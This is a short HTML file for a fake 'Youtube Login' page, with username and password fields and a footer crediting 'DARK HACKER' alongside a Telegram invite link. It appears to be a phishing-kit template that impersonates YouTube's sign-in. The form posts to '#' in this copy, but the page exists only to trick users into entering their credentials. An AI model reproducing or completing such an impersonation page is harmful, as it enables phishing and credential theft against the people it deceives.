<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Youtube Login</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <h2>Login to Youtube</h2>
    <form action="#" method="POST">
        <input type="text" name="username" placeholder="Username or Email" required><br>
        <input type="password" name="password" placeholder="Password" required><br>
        <button type="submit">Login</button>
    </form>
    <footer>
        <p>Powered by 𝑫𝑨𝑹𝑲 𝑯𝑨𝑪𝑲𝑬𝑹 - <a href="https://t.me/+PFbp1Ayc_1I3ZTFk" target="_blank">Join our Telegram</a></p>
    </footer>
</body>
</html>